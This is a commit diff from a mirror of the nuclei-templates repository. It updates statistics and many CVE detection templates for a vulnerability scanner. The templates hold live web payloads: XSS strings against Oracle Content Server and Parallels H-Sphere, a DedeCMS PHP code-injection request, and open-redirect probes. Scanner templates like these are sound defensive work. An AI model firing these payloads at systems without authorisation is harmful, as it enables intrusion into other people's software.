daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into patch-31

patch-1
Prince Chaddha 2022-11-21 10:25:23 +05:30 committed by GitHub
parent 4891344943 d5ec9f7d0d
commit 044920064e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
810 changed files with 14837 additions and 3334 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

65
.new-additions
View File

@ -1,21 +1,44 @@
cves/2022/CVE-2022-41473.yaml
default-logins/dataiku/dataiku-default-login.yaml
default-logins/processwire-login.yaml
exposed-panels/bmc/bmc-discovery-panel.yaml
exposed-panels/dataiku-panel.yaml
exposed-panels/novnc-login-panel.yaml
exposed-panels/opengear-panel.yaml
exposed-panels/piwigo-panel.yaml
exposed-panels/totemomail-panel.yaml
exposures/configs/cakephp-config.yaml
exposures/files/travis-ci-disclosure.yaml
exposures/tokens/loqate/loqate-api-key.yaml
misconfiguration/iot-vdme-simulator.yaml
misconfiguration/springboot/springboot-auditevents.yaml
misconfiguration/springboot/springboot-features.yaml
misconfiguration/springboot/springboot-jolokia.yaml
misconfiguration/springboot/springboot-logfile.yaml
misconfiguration/springboot/springboot-loggerconfig.yaml
ssl/weak-cipher-suites.yaml
takeovers/surveysparrow-takeover.yaml
technologies/oracle/oracle-atg-commerce.yaml
cves/2020/CVE-2020-13121.yaml
cves/2020/CVE-2020-21012.yaml
cves/2020/CVE-2020-24902.yaml
cves/2020/CVE-2020-24903.yaml
cves/2020/CVE-2020-29284.yaml
cves/2021/CVE-2021-43510.yaml
cves/2022/CVE-2022-0349.yaml
cves/2022/CVE-2022-1442.yaml
cves/2022/CVE-2022-2379.yaml
cves/2022/CVE-2022-3484.yaml
cves/2022/CVE-2022-3578.yaml
cves/2022/CVE-2022-40881.yaml
default-logins/tooljet/tooljet-default-login.yaml
exposed-panels/apache-jmeter-dashboard.yaml
exposed-panels/np-data-cache.yaml
exposed-panels/opencpu-panel.yaml
exposed-panels/selenium-grid.yaml
exposed-panels/tekton-dashboard.yaml
exposed-panels/wagtail-cms-detect.yaml
exposed-panels/xibocms-login.yaml
exposures/files/apache-licenserc.yaml
file/keys/github-recovery-code.yaml
iot/pqube-power-analyzers.yaml
misconfiguration/blackbox-exporter-metrics.yaml
misconfiguration/bootstrap-admin-panel-template.yaml
misconfiguration/docmosis-tornado-server.yaml
misconfiguration/haproxy-exporter-metrics.yaml
misconfiguration/installer/tasmota-install.yaml
misconfiguration/pcdn-cache-node.yaml
misconfiguration/phpmemcached-admin-panel.yaml
misconfiguration/tasmota-config-webui.yaml
misconfiguration/typo3-debug-mode.yaml
misconfiguration/unauth-mercurial.yaml
misconfiguration/unauth-selenium-grid-console.yaml
network/detection/dotnet-remoting-service-detect.yaml
network/detection/esmtp-detect.yaml
network/detection/imap-detect.yaml
network/detection/pop3-detect.yaml
network/detection/telnet-detect.yaml
technologies/notion-detect.yaml
technologies/secui-waf-detect.yaml
technologies/sogo-detect.yaml
technologies/tornado-server-login.yaml
vulnerabilities/opencpu/opencpu-rce.yaml

1
.nuclei-ignore
View File

@ -27,6 +27,7 @@ files:
- cves/2007/CVE-2007-5728.yaml
- cves/2014/CVE-2014-9608.yaml
- cves/2018/CVE-2018-5233.yaml
- cves/2019/CVE-2019-14696.yaml
- cves/2020/CVE-2020-11930.yaml
- cves/2020/CVE-2020-19295.yaml
- cves/2020/CVE-2020-2036.yaml

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1487 | daffainfo | 646 | cves | 1466 | info | 1533 | http | 4005 |
| panel | 687 | dhiyaneshdk | 622 | exposed-panels | 694 | high | 1071 | file | 77 |
| edb | 574 | pikpikcu | 338 | vulnerabilities | 516 | medium | 789 | network | 54 |
| lfi | 516 | pdteam | 273 | technologies | 296 | critical | 527 | dns | 17 |
| xss | 514 | geeknik | 196 | exposures | 290 | low | 231 | | |
| wordpress | 443 | dwisiswant0 | 170 | misconfiguration | 250 | unknown | 16 | | |
| exposure | 433 | 0x_akoko | 167 | token-spray | 234 | | | | |
| cve2021 | 361 | princechaddha | 151 | workflows | 190 | | | | |
| rce | 340 | ritikchaddha | 139 | default-logins | 106 | | | | |
| wp-plugin | 338 | pussycat0x | 137 | file | 77 | | | | |
| cve | 1526 | dhiyaneshdk | 687 | cves | 1504 | info | 1618 | http | 4218 |
| panel | 747 | daffainfo | 659 | exposed-panels | 751 | high | 1135 | file | 77 |
| edb | 575 | pikpikcu | 340 | vulnerabilities | 517 | medium | 822 | network | 70 |
| xss | 533 | pdteam | 274 | misconfiguration | 338 | critical | 540 | dns | 17 |
| exposure | 525 | geeknik | 196 | technologies | 306 | low | 260 | | |
| lfi | 518 | dwisiswant0 | 171 | exposures | 300 | unknown | 23 | | |
| wordpress | 460 | 0x_akoko | 169 | token-spray | 235 | | | | |
| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | |
| wp-plugin | 355 | pussycat0x | 157 | default-logins | 113 | | | | |
| rce | 343 | princechaddha | 153 | file | 77 | | | | |
**301 directories, 4386 files**.
**312 directories, 4617 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

4252
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1487 | daffainfo | 646 | cves | 1466 | info | 1533 | http | 4005 |
| panel | 687 | dhiyaneshdk | 622 | exposed-panels | 694 | high | 1071 | file | 77 |
| edb | 574 | pikpikcu | 338 | vulnerabilities | 516 | medium | 789 | network | 54 |
| lfi | 516 | pdteam | 273 | technologies | 296 | critical | 527 | dns | 17 |
| xss | 514 | geeknik | 196 | exposures | 290 | low | 231 | | |
| wordpress | 443 | dwisiswant0 | 170 | misconfiguration | 250 | unknown | 16 | | |
| exposure | 433 | 0x_akoko | 167 | token-spray | 234 | | | | |
| cve2021 | 361 | princechaddha | 151 | workflows | 190 | | | | |
| rce | 340 | ritikchaddha | 139 | default-logins | 106 | | | | |
| wp-plugin | 338 | pussycat0x | 137 | file | 77 | | | | |
| cve | 1526 | dhiyaneshdk | 687 | cves | 1504 | info | 1618 | http | 4218 |
| panel | 747 | daffainfo | 659 | exposed-panels | 751 | high | 1135 | file | 77 |
| edb | 575 | pikpikcu | 340 | vulnerabilities | 517 | medium | 822 | network | 70 |
| xss | 533 | pdteam | 274 | misconfiguration | 338 | critical | 540 | dns | 17 |
| exposure | 525 | geeknik | 196 | technologies | 306 | low | 260 | | |
| lfi | 518 | dwisiswant0 | 171 | exposures | 300 | unknown | 23 | | |
| wordpress | 460 | 0x_akoko | 169 | token-spray | 235 | | | | |
| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | |
| wp-plugin | 355 | pussycat0x | 157 | default-logins | 113 | | | | |
| rce | 343 | princechaddha | 153 | file | 77 | | | | |

6
cnvd/2021/CNVD-2021-09650.yaml
View File

@ -1,12 +1,14 @@
id: CNVD-2021-09650
info:
name: Ruijie EWEB Gateway Platform - Remote Command Injection
author: daffainfo
name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
author: daffainfo,pikpikcu
severity: critical
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
reference:
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
- https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
- https://www.ruijienetworks.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0

36
cves/2007/CVE-2007-2449.yaml
View File

@ -1,36 +0,0 @@
id: CVE-2007-2449
info:
name: Apache Tomcat 4.x-7.x - Cross-Site Scripting
author: pdteam
severity: low
description: Apache Tomcat 4.x through 7.x contains a cross-site scripting vulnerability which can be used by an attacker to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
reference:
- https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks
- http://tomcat.apache.org/security-6.html
- http://tomcat.apache.org/security-4.html
- http://tomcat.apache.org/security-5.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
metadata:
shodan-query: title:"Apache Tomcat"
tags: cve,cve2007,apache,misconfig,tomcat,disclosure,xss
requests:
- method: GET
path:
- "{{BaseURL}}/examples/jsp/snp/snoop.jsp"
matchers-condition: and
matchers:
- type: word
words:
- 'Request URI: /examples/jsp/snp/snoop.jsp'
- type: status
status:
- 200
# Enhanced by mp on 2022/09/15

42
cves/2008/CVE-2008-6465.yaml Normal file
View File

@ -0,0 +1,42 @@
id: CVE-2008-6465
info:
name: Parallels H-Sphere - Cross Site Scripting
author: edoardottt
severity: medium
description: |
Multiple cross-site scripting (XSS) vulnerabilities in login.php in webshell4 in Parallels H-Sphere 3.0.0 P9 and 3.1 P1 allow remote attackers to inject arbitrary web script or HTML via the (1) err, (2) errorcode, and (3) login parameters.
reference:
- http://www.xssing.com/index.php?x=3&y=65
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
classification:
cve-id: CVE-2008-6465
metadata:
verified: true
shodan-query: title:"Parallels H-Sphere
tags: cve,cve2008,xss,parallels,h-sphere
requests:
- method: GET
path:
- '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '\" onfocus=alert(document.domain); autofocus'
- 'Please enter login name &amp; password'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200

2
cves/2010/CVE-2010-1980.yaml
View File

@ -4,7 +4,7 @@ info:
name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12085
- https://www.cvedetails.com/cve/CVE-2010-1980

2
cves/2010/CVE-2010-2033.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2010-2033
info:
name: Joomla Percha Categories Tree 0.6 - Local File Inclusion
name: Joomla! Percha Categories Tree 0.6 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.

2
cves/2015/CVE-2015-4074.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2015-4074
info:
name: Joomla Helpdesk Pro plugin <1.4.0 - Local File Inclusion
name: Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.

8
cves/2016/CVE-2016-10368.yaml
View File

@ -1,15 +1,15 @@
id: CVE-2016-10368
info:
name: Opsview Monitor Pro 4.5.x - Open Redirect
name: Opsview Monitor Pro - Open Redirect
author: 0x_Akoko
severity: medium
description: |
Open redirect vulnerability in Opsview Monitor Pro (Prior to 5.1.0.162300841 prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.
Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.
reference:
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774
- https://nvd.nist.gov/vuln/detail/CVE-2016-10368
- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341
- https://nvd.nist.gov/vuln/detail/CVE-2016-10368
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -36,3 +36,5 @@ requests:
- type: status
status:
- 302
# Enhanced by mp on 2022/10/12

2
cves/2017/CVE-2017-1000029.yaml
View File

@ -31,4 +31,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/06/09
# Enhanced by mp on 2022/10/24

31
cves/2017/CVE-2017-10075.yaml
View File

@ -1,34 +1,47 @@
id: CVE-2017-10075
info:
name: Oracle Content Server Cross-Site Scripting
name: Oracle Content Server - Cross-Site Scripting
author: madrobot
severity: high
description: Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.
description: |
Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.
reference:
- http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-10075
- http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940
- https://nvd.nist.gov/vuln/detail/CVE-2017-10075
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2017-10075
metadata:
google-dork: inurl:"/cs/idcplg"
verified: "true"
tags: cve,cve2017,xss,oracle
requests:
- method: GET
path:
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO"
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E"
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO"
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg/onload=alert(document.domain)>"
- "ORACLE_QUERY"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
- type: word
words:
- "<script>alert(31337)</script>"
part: body
# Enhanced by mp on 2022/04/12

6
cves/2017/CVE-2017-11586.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2017-11586
info:
name: FineCms < 5.0.9 - Open redirect
name: FineCMS <5.0.9 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action.
FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
- https://nvd.nist.gov/vuln/detail/CVE-2017-11586
@ -37,3 +37,5 @@ requests:
part: header
regex:
- 'Refresh:(.*)url=http:\/\/interact\.sh'
# Enhanced by mp on 2022/10/12

5
cves/2017/CVE-2017-12138.yaml
View File

@ -4,11 +4,12 @@ info:
name: XOOPS Core 2.5.8 - Open Redirect
author: 0x_Akoko
severity: medium
description: XOOPS Core 2.5.8 has a stored URL redirect bypass vulnerability in /modules/profile/index.php because of the URL filter.
description: XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/XOOPS/XoopsCore25/issues/523
- https://xoops.org
- https://www.cvedetails.com/cve/CVE-2017-12138
- https://nvd.nist.gov/vuln/detail/CVE-2017-12138
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -35,3 +36,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

2
cves/2017/CVE-2017-17736.yaml
View File

@ -40,4 +40,4 @@ requests:
- "SQLServer"
condition: and
# Enhanced by cs on 2022/10/06
# Enhanced by cs on 2022/10/24

2
cves/2018/CVE-2018-1000861.yaml
View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-1000861
cwe-id: CWE-502
tags: kev,vulhub,cve,cve2018,jenkin,rce,jenkins
tags: kev,vulhub,cve,cve2018,rce,jenkins
requests:
- method: GET

4
cves/2018/CVE-2018-12300.yaml
View File

@ -4,7 +4,7 @@ info:
name: Seagate NAS OS 4.3.15.1 - Open Redirect
author: 0x_Akoko
severity: medium
description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter.
description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter.
reference:
- https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
- https://nvd.nist.gov/vuln/detail/CVE-2018-12300
@ -26,3 +26,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

8
cves/2018/CVE-2018-12675.yaml
View File

@ -1,16 +1,16 @@
id: CVE-2018-12675
info:
name: SV3C HD Camera L-SERIES - Open Redirect
name: SV3C HD Camera L Series - Open Redirect
author: 0x_Akoko
severity: medium
description: |
The SV3C HD Camera (L-SERIES V2.3.4.2103-S50-NTD-B20170508B and V2.3.4.2103-S50-NTD-B20170823B) does not perform origin checks on URLs that the camera's web interface redirects a user to. This can be leveraged to send a user to an unexpected endpoint.
SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory
- https://vuldb.com/?id.125799
- https://nvd.nist.gov/vuln/detail/CVE-2018-12675
- https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2018-12675
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -30,3 +30,5 @@ requests:
part: body
words:
- '<META http-equiv="Refresh" content="0;URL=http://interact.sh">'
# Enhanced by md on 2022/10/13

6
cves/2018/CVE-2018-14474.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2018-14474
info:
name: OrangeForum 1.4.0 - Open Redirect
name: Orange Forum 1.4.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
views/auth.go in Orange Forum 1.4.0 allows Open Redirection via the next parameter to /login or /signup.
Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa
- https://seclists.org/fulldisclosure/2019/Jan/32
@ -30,3 +30,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

7
cves/2018/CVE-2018-14574.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2018-14574
info:
name: Django Open Redirect
name: Django - Open Redirect
author: pikpikcu
severity: medium
description: django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect.
description: Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 contains an open redirect vulnerability. If django.middleware.common.CommonMiddleware and APPEND_SLASH settings are selected, and if the project has a URL pattern that accepts any path ending in a slash, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.djangoproject.com/weblog/2018/aug/01/security-releases/
- https://usn.ubuntu.com/3726-1/
@ -12,6 +12,7 @@ info:
- https://www.debian.org/security/2018/dsa-4264
- http://web.archive.org/web/20210124194607/https://www.securityfocus.com/bid/104970/
- https://access.redhat.com/errata/RHSA-2019:0265
- https://nvd.nist.gov/vuln/detail/CVE-2018-14574
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -34,3 +35,5 @@ requests:
- "Location: https://www.interact.sh"
- "Location: http://www.interact.sh"
part: header
# Enhanced by md on 2022/10/13

6
cves/2018/CVE-2018-16761.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2018-16761
info:
name: Eventum v3.3.4 - Open Redirect
name: Eventum <3.4.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
Eventum before 3.4.0 has an open redirect vulnerability.
Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/
- https://github.com/eventum/eventum/releases/tag/v3.4.0
@ -29,3 +29,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

18
cves/2018/CVE-2018-17246.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2018-17246
info:
name: Kibana - Local File Inclusion
author: princechaddha
author: princechaddha,thelicato
severity: critical
description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
reference:
@ -25,19 +25,19 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"message\":\"An internal server error occurred\""
part: body
- type: word
part: header
words:
- "kbn-name"
- "application/json"
- "kibana"
condition: and
part: header
- type: status
status:
- 500
condition: or
case-insensitive: true
# Enhanced by mp on 2022/05/13
- type: word
part: header
words:
- "application/json"

7
cves/2018/CVE-2018-17422.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2018-17422
info:
name: dotCMS < 5.0.2 - Open Redirect
name: dotCMS <5.0.2 - Open Redirect
author: 0x_Akoko,daffainfo
severity: medium
description: |
dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter.
dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/dotCMS/core/issues/15286
- https://www.cvedetails.com/cve/CVE-2018-17422
- https://nvd.nist.gov/vuln/detail/CVE-2018-17422
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -37,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/13

6
cves/2018/CVE-2018-19287.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2018-19287
info:
name: Ninja Forms <= 3.3.17 - Cross-Site Scripting
name: WordPress Ninja Forms <3.3.18 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
XSS in the Ninja Forms plugin before 3.3.18 for WordPress allows Remote Attackers to execute JavaScript.
WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/fb036dc2-0ee8-4a3e-afac-f52050b3f8c7
- https://wordpress.org/plugins/ninja-forms/
@ -50,3 +50,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/17

2
cves/2018/CVE-2018-20526.yaml
View File

@ -78,4 +78,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/10/06
# Enhanced by mp on 2022/10/07

7
cves/2018/CVE-2018-6200.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2018-6200
info:
name: vBulletin 3.x.x & 4.2.x - Open Redirect
name: vBulletin - Open Redirect
author: 0x_Akoko,daffainfo
severity: medium
description: |
vBulletin 3.x.x and 4.2.x through 4.2.5 has an open redirect via the redirector.php url parameter.
vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://cxsecurity.com/issue/WLB-2018010251
- https://www.cvedetails.com/cve/CVE-2018-6200
- https://nvd.nist.gov/vuln/detail/CVE-2018-6200
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -35,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/13

6
cves/2018/CVE-2018-7700.yaml
View File

@ -19,7 +19,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}"
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"
matchers-condition: and
matchers:
@ -27,9 +27,7 @@ requests:
- type: word
part: body
words:
- "phpinfo"
- "PHP Version"
condition: and
- "4cc32a3a81d2bb37271934a48ce4468a"
- type: status
status:

6
cves/2019/CVE-2019-1010290.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2019-1010290
info:
name: Babel - Open Redirection
name: Babel - Open Redirect
author: 0x_Akoko
severity: medium
description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker
